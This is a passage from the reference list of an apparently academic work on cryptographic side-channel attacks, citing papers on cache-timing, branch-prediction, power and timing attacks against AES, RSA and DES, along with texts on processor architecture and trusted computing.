Paper). 8th International Conference on Information and Communications
Security — ICICS06, P. Ning, S. Qing, and N. Li, editors, pages 112-121,
Springer-Verlag, Lecture Notes in Computer Science series 4307, 2006.
[5] O. Acıiçmez, W. Schindler, and Ç. K. Koç. Cache Based Remote Timing
Attack on the AES. Topics in Cryptology — CT-RSA 2007, The Cryptographers’ Track at the RSA Conference 2007, M. Abe, editor, pages 271-286,
Springer-Verlag, Lecture Notes in Computer Science series 4377, 2007.
[6] O. Acıiçmez, W. Schindler, Ç. K. Koç. Improving Brumley and Boneh Timing Attack on Unprotected SSL Implementations. Proceedings of the 12th
ACM Conference on Computer and Communications Security, C. Meadows
and P. Syverson, editors, pages 139-146, ACM Press, 2005.
[7] O. Acıiçmez, J.-P. Seifert, and Ç. K. Koç. Predicting Secret Keys via Branch
Prediction. Cryptology ePrint Archive, Report 2006/288, August 2006.
[8] Advanced Encryption Standard (AES). Federal Information Processing
Standards Publication 197, 2001.
Available at http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
[9] AES Lounge. http://www.iaik.tugraz.at/research/krypto/AES/
[10] D. Agrawal, B. Archambeault, J. R. Rao, P. Rohatgi. The EM SideChannel(s). Cryptographic Hardware and Embedded Systems — CHES 2002,
B. S. Kaliski, Ç. K. Koç, and C. Paar, editors, pages 29-45, Springer-Verlag,
Lecture Notes in Computer Science series 2523, 2003.
[11] T. Austin, E. Larson, and D. Ernst. SimpleScalar: an infrastructure for
computer system modeling. IEEE Computer, volume 35, issue 2, pages 59-67, February 2002.
[12] M. Bellare and P. Rogaway. Optimal asymmetric encryption — How to encrypt with RSA. Advances in Cryptology - EUROCRYPT ’94, Lecture Notes
in Computer Science, volume 950, Springer-Verlag, 1995, pp. 92-111.
[13] D. E. Bell and L. La Padula. Secure Computer Systems: Mathematical
Foundations and Model. Technical Report M74-244, MITRE Corporation,
1973.
[14] D. J. Bernstein. Cache-timing attacks on AES. Technical Report, 37 pages,
April 2005. Available at:
http://cr.yp.to/antiforgery/cachetiming-20050414.pdf
[15] G. Bertoni, V. Zaccaria, L. Breveglieri, M. Monchiero, G. Palermo. AES
Power Attack Based on Induced Cache Miss and Countermeasure. International Symposium on Information Technology: Coding and Computing ITCC 2005, volume 1, pages 4-6, 2005.
[16] D. Bleichenbacher. Chosen Ciphertext Attacks Against Protocols Based
on the RSA Encryption Standard PKCS #1. Advances in Cryptology CRYPTO ’98, H. Krawczyk, editor, pages 1-12, Springer-Verlag, Lecture
Notes in Computer Science series 1462, 1998.
[17] D. Boneh. Twenty years of attacks on the RSA cryptosystem. Notices of the
American Mathematical Society, volume 46, pp. 203-213, 1999.
Available at: http://www.ams.org/notices/199902/boneh.pdf
[18] J. Bonneau and I. Mironov. Cache-Collision Timing Attacks against AES.
Cryptographic Hardware and Embedded Systems — CHES 2006, L. Goubin
and M. Matsui, editors, pages 201-215, Springer-Verlag, Lecture Notes in
Computer Science series 4249, 2006.
[19] E. Brickell, G. Graunke, M. Neve, J.-P. Seifert. Software mitigations to hedge
AES against cache-based software side channel vulnerabilities. Cryptology
ePrint Archive, Report 2006/052, February 2006.
[20] R. H. Brown, M. L. Good, A. Prabhakar. Data Encryption Standard (DES)
(FIPS 46-2). Federal Information Processing Standards Publication (FIPS),
Dec 1993. Available at: http://www.itl.nist.gov/fipspubs/fip46-2.html
(initial version from Jan 15, 1977).
[21] D. Brumley and D. Boneh. Remote Timing Attacks are Practical. Proceedings of the 12th Usenix Security Symposium, pages 1-14, 2003.
[22] D. Burger, T. M. Austin, and S. Bennett. Evaluating future microprocessors:
The simplescalar tool set. Technical Report CS-TR-1996-1308, 1996.
[23] B. Canvel, A. Hiltgen, S. Vaudenay, M. Vuagnoux. Password Interception
in a SSL/TSL Channel. Advances in Cryptology - CRYPTO ’03, D. Boneh,
editor, pages 583-599, Springer-Verlag, Lecture Notes in Computer Science
series 2729, 2003.
[24] S. Chari, J. R. Rao, P. Rohatgi. Template Attacks. Cryptographic Hardware
and Embedded Systems — CHES 2002, B. S. Kaliski Jr, Ç. K. Koç, and
C. Paar, editors, pages 13-28, Springer-Verlag, Lecture Notes in Computer
Science series 2523, 2003.
[25] Y. Chen, P. England, M. Peinado, and B. Willman. High Assurance Computing on Open Hardware Architectures. Technical Report, MSR-TR-2003-20,
17 pages, Microsoft Corporation, March 2003. Available at:
ftp://ftp.research.microsoft.com/pub/tr/tr-2003-20.ps
[26] B. Chevallier-Mames, M. Ciet, and M. Joye. Low-cost solutions for preventing simple side-channel analysis: side-channel atomicity. IEEE Transactions
on Computers, volume 53, issue 6, pages 760-768, June 2004.
[27] D. Coppersmith. Small Solutions to Polynomial Equations, and Low Exponent RSA Vulnerabilities. Journal of Cryptology, volume 10, issue 4, pages
233-260, 1997.
[28] J.-S. Coron, D. Naccache, and P. Kocher. Statistics and Secret Leakage.
ACM Transactions on Embedded Computing Systems, volume 3, issue 3,
pages 492-508, August 2004.
[29] S. C. Coutinho. The Mathematics of Ciphers: Number Theory and RSA
Cryptography. AK Peters, 1998.
[30] Cryptographic Key Length Recommendation. Available at: http://www.keylength.com
[31] J. Daemen, V. Rijmen. The Design of Rijndael: AES - The Advanced Encryption Standard. Springer-Verlag, 2002.
[32] Department of Defence. Trusted Computing System Evaluation Criteria (Orange Book). DoD 5200.28-STD, 1985.
[33] R. C. Detmer. Introduction to 80X86 Assembly Language and Computer
Architecture. Jones & Bartlett Publishers, 2001.
[34] J.-F. Dhem, F. Koeune, P.-A. Leroux, P.-A. Mestré, J.-J. Quisquater, J.-L.
Willems. A Practical Implementation of the Timing Attack. Smart Card –
Research and Applications, J.-J. Quisquater and B. Schneier, editors, pages
175-191, Springer-Verlag, Lecture Notes in Computer Science series 1820,
2000.
[35] P. England, B. Lampson, J. Manferdelli, M. Peinado, and B. Willman. A
Trusted Open Platform. IEEE Computer, volume 36, issue 7, pages 55-62,
July 2003.
[36] W. Feller. Introduction to Probability Theory and Its Applications (Volume
1). 3rd edition, revised printing, New York, Wiley, 1970.
[37] K. Gandolfi, C. Mourtel, F. Olivier. Electromagnetic Analysis: Concrete
Results. Cryptographic Hardware and Embedded Systems — CHES 2001, Ç.
K. Koç, D. Naccache, and C. Paar, editors, pages 251-261, Springer-Verlag,
Lecture Notes in Computer Science series 2162, 2001.
[38] P. Gänssler, W. Stute: Wahrscheinlichkeitstheorie. Springer, Berlin 1977.
[39] P. Genua. A Cache Primer. Technical Report, Freescale Semiconductor Inc.,
16 pages, 2004. Available at:
http://www.freescale.com/files/32bit/doc/app note/AN2663.pdf
[40] GNU Project: GMP:
http://www.swox.com/gmp/.
[41] S. Gochman, R. Ronen, I. Anati, A. Berkovits, T. Kurts, A. Naveh, A. Saeed,
Z. Sperber, and R. Valentine. The Intel Pentium M Processor: Microarchitecture and performance. Intel Technology Journal, volume 7, issue 2, May
2003.
[42] D. Grawrock. The Intel Safer Computing Initiative: Building Blocks for
Trusted Computing, Intel Press, 2006.
[43] J. Handy. The Cache Memory Book. 2nd edition, Morgan Kaufmann, 1998.
[44] A. Hevia and M. Kiwi. Strength of Two Data Encryption Standard Implementations under Timing Attacks. ACM Transactions on Information and
System Security — TISSEC, volume 4, issue 2, pages 416-437, November
1999.
[45] F. H. Hinsley, A. Stripp. Code Breakers. Oxford University Press, 1993.
[46] History of Computer Security Project: Early Papers. National Institute of
Standards and Technology (NIST), Computer Security Division: Computer
Security Resource Center.
Available at: http://csrc.nist.gov/publications/history/index.html
[47] N. A. Howgrave-Graham and N. P. Smart. Lattice Attacks on Digital Signature Schemes. Design, Codes and Cryptography, Volume 23, pages 283-290,
2001.
[48] W. M. Hu. Lattice scheduling and covert channels. Proceedings of the IEEE
Symposium on Security and Privacy, pages 52-61, IEEE Computer Society,
1992.
[49] M. Joye and P. Paillier. How to Use RSA; or How to Improve the Efficiency
of RSA without Loosing its Security. ISSE 2002, U. Schulte, Ed., Paris,
France, October 2–4, 2002
[50] M. Joye, J.-J. Quisquater, and T. Takagi. How to Choose Secret Parameters for RSA-Type Cryptosystems over Elliptic Curves. Designs, Codes and
Cryptography, volume 23, issue 3, pages 297-316, 2001.
[51] M. Joye and K. Villegas. A protected division algorithm. Smart Card Research and Advanced Applications — CARDIS 2002, P. Honeyman, editor,
pages 69-74, Usenix Association, 2002.
[52] M. Joye and S.-M. Yen. The Montgomery powering ladder. Cryptographic
Hardware and Embedded Systems — CHES 2002, B. S. Kaliski Jr, Ç. K.
Koç, and C. Paar, editors, pages 291-302, Springer-Verlag, Lecture Notes in
Computer Science series 2523, 2003.
[53] H. Kahl. SPA-based attack against the modular reduction within a partially secured RSA-CRT implementation. Cryptology ePrint Archive, Report
2004/197, 2004.
[54] J. Kelsey, B. Schneier, D. Wagner, C. Hall. Side Channel Cryptanalysis of
Product Ciphers. Journal of Computer Security, volume 8, pages 141-158,
2000.
[55] N. S. Kim, T. Austin, T. Mudge, and D. Grunwald. Challenges for architectural level power modeling. Power-Aware Computing, R. Melhem and
R.Graybill, editors, 2001.
[56] N. Koblitz. A Course in Number Theory and Cryptography (Graduate Texts
in Mathematics). Springer, 1994
[57] Ç. K. Koç. High-Speed RSA Implementation. TR 201, RSA Laboratories,
73 pages, November 1994.
[58] Ç. K. Koç. RSA Hardware Implementation. TR 801, RSA Laboratories, 30
pages, April 1996.
[59] P. C. Kocher. Timing Attacks on Implementations of Diffie–Hellman, RSA,
DSS, and Other Systems. Advances in Cryptology - CRYPTO ’96, N.
Koblitz, editor, pages 104-113, Springer-Verlag, Lecture Notes in Computer
Science series 1109, 1996.
[60] P. C. Kocher, J. Jaffe, B. Jun. Differential Power Analysis. Advances in
Cryptology - CRYPTO ’99, M. Wiener, editor, pages 388-397, Springer-Verlag, Lecture Notes in Computer Science series 1666, 1999.
[61] F. Koeune, J. J. Quisquater. A Timing Attack against Rijndael. Technical
Report CG-1999/1, June 1999.
[62] C. Lauradoux. Collision attacks on processors with cache and countermeasures. Western European Workshop on Research in Cryptology — WEWoRC
2005, C. Wolf, S. Lucks, and P.-W. Yau, editors, pages 76-85, 2005.
[63] M. Matsui. New Block Encryption Algorithm MISTY. Proceedings of the 4th
International Workshop on Fast Software Encryption, G. Goos, J. Hartmanis
and J. van Leeuwen, editors, pages 54-68, Springer-Verlag, Lecture Notes in
Computer Science series 1267, 1997.
[64] A. J. Menezes, P. van Oorschot, and S. Vanstone. Handbook of Applied Cryptography. CRC Press, New York, 1997.
[65] M. Milenkovic, A. Milenkovic, and J. Kulick. Microbenchmarks for Determining Branch Predictor Organization. Software Practice & Experience, volume 34, issue 5, pages 465-487, April 2004.
[66] M. Neve. Cache-based Vulnerabilities and SPAM Analysis. Ph.D. Thesis,
Applied Science, UCL, July 2006
[67] M. Neve and J.-P. Seifert. Advances on Access-driven Cache Attacks on
AES. Selected Areas of Cryptography — SAC’06, to appear.
[68] M. Neve, J.-P. Seifert, Z. Wang. A refined look at Bernstein’s AES sidechannel analysis. Proceedings of ACM Symposium on Information, Computer
and Communications Security — ASIACCS’06, to appear, Taipei, Taiwan,
March 21-24, 2006.
[69] P. Q. Nguyen and I. E. Shparlinski. The Insecurity of the Digital Signature
Algorithm with Partially Known Nonces. Journal of Cryptology, Volume 15,
Issue 3, pages 151-176, Springer, 2002.
[70] P. Q. Nguyen and I. E. Shparlinski. The Insecurity of the Elliptic Curve
Digital Signature Algorithm with Partially Known Nonces. Design, Codes
and Cryptography, Volume 30, pages 201-217, 2003.
[71] Openssl: the open-source toolkit for ssl/tls.
Available at: http://www.openssl.org/.
[72] D. A. Osvik, A. Shamir, and E. Tromer. Other People’s Cache: Hyper Attacks on HyperThreaded Processors. Presentation available at:
http://www.wisdom.weizmann.ac.il/~tromer/.
[73] D. A. Osvik, A. Shamir, and E. Tromer. Cache Attacks and Countermeasures: The Case of AES. Topics in Cryptology — CT-RSA 2006, The Cryptographers’ Track at the RSA Conference 2006, D. Pointcheval, editor, pages
1-20, Springer-Verlag, Lecture Notes in Computer Science series 3860, 2006
[74] R. van der Pas. Memory Hierarchy in Cache-Based Systems. Technical Report, Sun Microsystems Inc., 28 pages, 2002.
Available at: http://www.sun.com/blueprints/1102/817-0742.pdf
[75] D. Page. Theoretical Use of Cache Memory as a Cryptanalytic Side-Channel.
Technical Report CSTR-02-003, Department of Computer Science, University of Bristol, June 2002.
[76] D. Page. Defending Against Cache Based Side-Channel Attacks. Technical
Report. Department of Computer Science, University of Bristol, 2003.
[77] D. Page. Partitioned Cache Architecture as a Side Channel Defence Mechanism. Cryptography ePrint Archive, Report 2005/280, August 2005.
[78] D. Patterson and J. Hennessy. Computer Architecture: A Quantitative Approach. 4th edition, Morgan Kaufmann, 2006.
[79] S. Pearson. Trusted Computing Platforms: TCPA Technology in Context,
Prentice Hall PTR, 2002.
[80] C. Percival. Cache missing for fun and profit. BSDCan 2005, Ottawa, 2005.
Available at:
http://www.daemonology.net/hyperthreading-considered-harmful/
[81] C. P. Pfleeger and S. L. Pfleeger. Security in Computing. 3rd edition, Prentice
Hall PTR, 2002.
[82] R.L. Rivest, A. Shamir, L.M. Adleman. A Method for Obtaining Digital
Signatures and Public-key Cryptosystems. Communications of the ACM,
volume 21, pages 120-126, 1978.
[83] E. Rotenberg, S. Bennett, and J. E. Smith. Trace cache: a low latency approach to high bandwidth instruction fetching. Proceedings of the 29th Annual ACM/IEEE Intl. Symposium on Microarchitecture, pages 24-34, 1996.
[84] RSA Laboratories. PKCS #1 v2.1: RSA Encryption Standard. June 2002.
Available at: ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1.pdf.
[85] W. Schindler. A Timing Attack against RSA with the Chinese Remainder
Theorem. Cryptographic Hardware and Embedded Systems — CHES 2000,
Ç.K. Koç and C. Paar, editors, pages 110–125, Springer-Verlag, Lecture
Notes in Computer Science series 1965, 2000.
[86] W. Schindler. Optimized Timing Attacks against Public Key Cryptosystems.
Statistics and Decisions, volume 20, pages 191-210, 2002.
[87] W. Schindler. On the Optimization of Side-Channel Attacks by Advanced
Stochastic Methods. Public Key Cryptography — PKC 2005, S. Vaudenay,
editor, pages 85-103, Springer-Verlag, Lecture Notes in Computer Science
series 3386, 2005.
[88] W. Schindler, F. Koeune, and J.-J. Quisquater. Improving Divide and Conquer Attacks Against Cryptosystems by Better Error Detection / Correction
Strategies. Cryptography and Coding — IMA 2001, B. Honary, editor, pages
245-267, Springer-Verlag, Lecture Notes in Computer Science series 2260,
2001.
[89] W. Schindler, F. Koeune, J.-J. Quisquater. Unleashing the Full Power of
Timing Attack. Technical Report CG-2001/3, Universite Catholique de Louvain, 2001.
[90] B. Schneier. Applied Cryptography: Protocols, Algorithms, and Source Code
in C. John Wiley & Sons, 1996.
[91] T. Shanley. The Unabridged Pentium 4: IA32 Processor Genealogy. Addison-Wesley Professional, 2004.
[92] J. Shen and M. Lipasti. Modern Processor Design: Fundamentals of Superscalar Processors. McGraw-Hill, 2005.
[93] A. Silberschatz, G. Gagne, and P. B. Galvin. Operating system concepts. 7th
edition, John Wiley and Sons, 2005.
[94] S. W. Smith. Trusted Computing Platforms: Design and Applications,
Springer-Verlag, 2004.
[95] O. Sibert, P. A. Porras, and R. Lindell. The Intel 80x86 Processor Architecture: Pitfalls for Secure Systems. IEEE Symposium on Security and Privacy,
pages 211-223, 1995.
[96] W. Stallings. Cryptography and Network Security: Principles and Practice.
3rd Edition, Prentice Hall, 2002
[97] D. R. Stinson. Cryptography: Theory and Practice. 2nd Edition, CRC Press,
2002
[98] H. C. A. van Tilborg. Encyclopedia of Cryptography and Security. Springer,
2005
[99] Trusted Computing Group, http://www.trustedcomputinggroup.org.
[100] Y. Tsunoo, T. Saito, T. Suzaki, M. Shigeri, H. Miyauchi. Cryptanalysis of
DES Implemented on Computers with Cache. Cryptographic Hardware and
Embedded Systems — CHES 2003, C. D. Walter, Ç. K. Koç, and C. Paar,
editors, pages 62-76, Springer-Verlag, Lecture Notes in Computer Science
series 2779, 2003.
[101] Y. Tsunoo, E. Tsujihara, K. Minematsu, H. Miyauchi. Cryptanalysis of
Block Ciphers Implemented on Computers with Cache. ISITA 2002, 2002.
[102] Y. Tsunoo, E. Tsujihara, M. Shigeri, H. Kubo, K. Minematsu. Improving
cache attacks by considering cipher structure. International Journal of Information Security, volume 5, issue 3, pages 166-176, Springer-Verlag, 2006.
[103] R. Uhlig, G. Neiger, D. Rodgers, A. L. Santoni, F. C. M. Martins, A. V. Anderson, S. M. Bennett, A. Kagi, F. H. Leung, L. Smith. Intel Virtualization
Technology, IEEE Computer, volume 38, issue 5, pages 48-56, May 2005.
[104] S. Vaudenay. A Classical Introduction to Cryptography: Applications for
Communications Security. Springer, 2005.
[105] C. D. Walter. Montgomery Exponentiation Needs No Final Subtractions.
IEE Electronics Letters, volume 35, issue 21, pages 1831-1832, October 1999.
[106] W. Ware. Security Controls for Computer Systems. Report of Defense Science Board Task Force on Computer Security; Rand Report R609-1, The
RAND Corporation, 1970.